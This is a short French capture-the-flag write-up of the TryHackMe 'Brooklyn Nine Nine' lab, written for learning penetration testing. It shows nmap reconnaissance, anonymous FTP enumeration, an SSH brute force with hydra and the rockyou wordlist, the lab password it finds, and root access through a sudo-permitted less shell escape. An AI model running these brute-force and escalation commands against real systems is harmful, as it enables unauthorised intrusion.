# 🕵️‍♂️ TryHackMe — Brooklyn Nine Nine

## 🎯 Objectif

Compromettre la machine et obtenir les flags user et root.

---

## 🔍 Reconnaissance

```bash
nmap -sV -sC <IP>
```

### Résultats

* 21/tcp → FTP (anonymous login allowed)
* 22/tcp → SSH
* 80/tcp → HTTP

---

## 🔓 Accès initial (FTP)

Connexion :

```bash
ftp <IP>
```

Login :

```
anonymous
```

Fichier trouvé :

```
note_to_jake.txt
```

Indice :

* utilisateur : jake
* mot de passe faible

---

## 💣 Bruteforce SSH

```bash
hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://<IP>
```

Résultat :

```
jake : 987654321
```

---

## 🔐 Accès SSH

```bash
ssh jake@<IP>
```

---

## 👑 Privilege Escalation

```bash
sudo -l
```

Résultat :

```
(ALL) NOPASSWD: /usr/bin/less
```

Exploit :

```bash
sudo less /etc/passwd
```

Puis dans less :

```
!/bin/bash
```

→ accès root

---

## 🎯 Flags

### User flag

```bash
find / -name "user.txt" 2>/dev/null
cat /home/holt/user.txt
```

### Root flag

```bash
cat /root/root.txt
```

---

## 🧠 Conclusion

* FTP anonyme → fuite d'information
* mot de passe faible → brute force
* mauvaise configuration sudo → root

---

## 🔥 Compétences acquises

* Nmap
* FTP enumeration
* Hydra brute force
* SSH
* Privilege escalation
